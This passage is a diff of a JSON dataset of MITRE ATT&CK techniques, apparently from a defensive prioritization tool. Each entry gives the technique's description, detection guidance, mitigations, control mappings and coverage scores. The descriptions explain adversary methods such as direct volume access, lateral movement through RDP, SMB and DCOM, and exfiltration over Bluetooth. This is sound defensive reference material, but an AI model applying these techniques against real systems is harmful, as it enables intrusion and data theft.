+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.20546772095238097,
-        "adjusted_score": 0.20546772095238097,
-        "has_car": true,
+        "cumulative_score": 0.37409616142857144,
+        "adjusted_score": 0.37409616142857144,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [],
-        "nist_controls": [],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
+            "SI-4"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.08095238095238096,
-            "detection_score": 0.17
+            "combined_score": 0.17142857142857143,
+            "mitigation_score": 0.23636363636363636,
+            "detection_score": 0.1
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.02451534
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00266759
     },
     {
-        "tid": "T1018",
-        "name": "Remote System Discovery",
-        "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n",
-        "url": "https://attack.mitre.org/techniques/T1018",
+        "tid": "T1006",
+        "name": "Direct Volume Access",
+        "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)",
+        "url": "https://attack.mitre.org/techniques/T1006",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
+        "detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
-            "Network Traffic: Network Connection Creation",
-            "Process: Process Creation"
+            "Drive: Drive Access"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.30044282095238095,
-        "adjusted_score": 0.30044282095238095,
-        "has_car": true,
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
+        "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.18095238095238095,
-            "detection_score": 0.38
+            "combined_score": 0.009523809523809523,
+            "detection_score": 0.02
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.01949044
+        "prevalence_score": 0
     },
     {
-        "tid": "T1020",
-        "name": "Automated Exfiltration",
-        "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
-        "url": "https://attack.mitre.org/techniques/T1020",
+        "tid": "T1007",
+        "name": "System Service Discovery",
+        "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
+        "url": "https://attack.mitre.org/techniques/T1007",
         "tactics": [
-            "Exfiltration"
+            "Discovery"
         ],
-        "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
         "platforms": [
-            "Linux",
-            "Network",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Script: Script Execution"
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1020.001",
-                "name": "Automated Exfiltration: Traffic Duplication",
-                "url": "https://attack.mitre.org/techniques/T1020/001",
-                "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
-                "detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    }
-                ]
-            }
-        ],
+        "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.15735438714285716,
-        "adjusted_score": 0.15735438714285716,
-        "has_car": false,
+        "cumulative_score": 0.12380952380952381,
+        "adjusted_score": 0.12380952380952381,
+        "has_car": true,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.057142857142857134,
-            "detection_score": 0.12
+            "combined_score": 0.023809523809523808,
+            "detection_score": 0.05
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.00021153
+        "prevalence_score": 0
     },
     {
-        "tid": "T1021",
-        "name": "Remote Services",
-        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
-        "url": "https://attack.mitre.org/techniques/T1021",
+        "tid": "T1008",
+        "name": "Fallback Channels",
+        "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+        "url": "https://attack.mitre.org/techniques/T1008",
         "tactics": [
-            "Lateral Movement"
+            "Command And Control"
         ],
-        "detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)",
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Logon Session: Logon Session Creation",
-            "Module: Module Load",
-            "Network Share: Network Share Access",
             "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.20476190476190476,
+        "adjusted_score": 0.20476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.10476190476190476,
+            "mitigation_score": 0.18181818181818182,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1010",
+        "name": "Application Window Discovery",
+        "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.",
+        "url": "https://attack.mitre.org/techniques/T1010",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
             "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.009523809523809523,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1011",
+        "name": "Exfiltration Over Other Network Medium",
+        "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network",
+        "url": "https://attack.mitre.org/techniques/T1011",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1021.001",
-                "name": "Remote Services: Remote Desktop Protocol",
-                "url": "https://attack.mitre.org/techniques/T1021/001",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)",
-                "detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
+                "tid": "T1011.001",
+                "name": "Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth",
+                "url": "https://attack.mitre.org/techniques/T1011/001",
+                "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
+                "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
                 "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
                     {
                         "mid": "M1042",
                         "name": "Disable or Remove Feature or Program",
                         "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
                         "url": "https://attack.mitre.org/mitigations/M1042"
                     },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
                     {
                         "mid": "M1028",
                         "name": "Operating System Configuration",
                         "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
                         "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
-            },
+            }
+        ],
+        "mitigations": [
             {
-                "tid": "T1021.002",
-                "name": "Remote Services: SMB/Windows Admin Shares",
-                "url": "https://attack.mitre.org/techniques/T1021/002",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
-                "detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.16666666666666669,
+        "adjusted_score": 0.16666666666666669,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-18",
+            "CM-6",
+            "CM-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.06666666666666667,
+            "mitigation_score": 0.12727272727272726
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1011.001",
+        "name": "Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth",
+        "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
+        "url": "https://attack.mitre.org/techniques/T1011/001",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1011",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "tid": "T1021.003",
-                "name": "Remote Services: Distributed Component Object Model",
-                "url": "https://attack.mitre.org/techniques/T1021/003",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)",
-                "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).",
-                "mitigations": [
-                    {
-                        "mid": "M1048",
-                        "name": "Application Isolation and Sandboxing",
-                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                        "url": "https://attack.mitre.org/mitigations/M1048"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1021.004",
-                "name": "Remote Services: SSH",
-                "url": "https://attack.mitre.org/techniques/T1021/004",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.",
-                "detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1021.005",
-                "name": "Remote Services: VNC",
